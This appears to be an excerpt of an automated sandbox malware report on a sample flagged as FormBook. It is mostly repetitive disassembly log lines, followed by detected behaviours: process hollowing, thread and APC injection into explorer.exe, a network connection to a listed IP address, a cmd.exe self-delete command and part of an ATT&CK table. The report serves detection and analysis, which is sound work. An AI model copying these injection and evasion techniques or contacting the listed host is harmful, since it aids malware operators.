          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004B81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004B81F7
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048A364 SetUnhandledExceptionFilter,0_2_0048A364
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0048A395

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.227 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 260000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\PI916810.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EED008Jump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004B8C93 LogonUserW,0_2_004B8C93
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00463B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00463B4C
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00464A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00464A35
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C4EC9 mouse_event,0_2_004C4EC9
          Source: C:\Users\user\Desktop\PI916810.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI916810.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004B81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004B81F7
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004C4C03
          Source: PI916810.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000002.4494090893.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095216810.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: PI916810.exe, explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4489300977.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4487289171.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2045268213.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.2044763297.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4486573997.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048886B cpuid 0_2_0048886B
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004950D7
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004A2230 GetUserNameW,0_2_004A2230
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0049418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0049418A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00464AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00464AFE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: PI916810.exeBinary or memory string: WIN_81
          Source: PI916810.exeBinary or memory string: WIN_XP
          Source: PI916810.exeBinary or memory string: WIN_XPe
          Source: PI916810.exeBinary or memory string: WIN_VISTA
          Source: PI916810.exeBinary or memory string: WIN_7
          Source: PI916810.exeBinary or memory string: WIN_8
          Source: PI916810.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_004D6596
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004D6A5A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
